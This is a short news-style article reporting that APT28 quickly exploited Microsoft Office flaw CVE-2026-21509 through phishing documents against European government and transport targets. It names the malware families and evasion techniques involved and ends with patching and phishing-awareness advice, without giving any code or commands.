Russian Hackers Pounce on Fresh Microsoft Office Flaw in Blitz Attack on Europe
APT28, the notorious Russian state-sponsored hacking group, is exploiting a brand-new Microsoft Office vulnerability just days after its disclosure, hitting military and government targets across Europe and beyond. In a lightning-fast operation dubbed Neusploit, they’re using phishing docs to sneak in backdoors and steal sensitive data from places like Ukraine, Poland, and Turkey.
Deep Dive into the Attack
The flaw is CVE-2026-21509, a security feature bypass in Microsoft Office with a CVSS score of 7.8—serious enough to let attackers bypass protections via a malicious RTF or Word file, no macros needed. Trellix spotted APT28 weaponizing it within 24 hours of Microsoft’s patch on January 26, 2026, while Zscaler traced attacks back to January 29 targeting Ukraine, Slovakia, and Romania.
Phishing lures masquerade as urgent docs on weapons smuggling or military drills, tricking users into opening them. Once clicked, they trigger chains dropping loaders like PixyNetLoader or SimpleLoader, which unpack payloads such as MiniDoor (an Outlook stealer), Covenant Grunt implants, or a custom C++ backdoor called BEARDSHELL. These use slick evasion tricks: COM hijacking for persistence, steganography in PNGs, DLL proxying, process injection, and legit cloud storage like filen.io for command-and-control to blend with normal traffic.
Ukraine’s CERT-UA confirmed over 60 government emails hit, with docs created January 27 pulling down LNK files and DLLs via WebDAV. Trellix’s February 4 report nails maritime and transport orgs in Poland, Slovenia, Turkey, Greece, UAE, and Ukraine as prime targets.
Why Devs Need to Sweat This
If you’re building or deploying Office-integrated apps, client-side tools, or anything touching enterprise email, this is a wake-up call—zero-days like CVE-2026-21509 show how nation-states turn 1-day exploits into global ops overnight. Patch your Microsoft stack yesterday, enforce macro blocks, and scan for these loaders in EDR logs; one unpatched endpoint can spill creds or pave the way for lateral movement in your org.
Final Take
APT28’s speed and sophistication scream urgency: update Office, train your team on phishing red flags, and layer defenses. In 2026’s cyber battlefield, hesitation hands hackers the keys—stay vigilant or become the next vector.
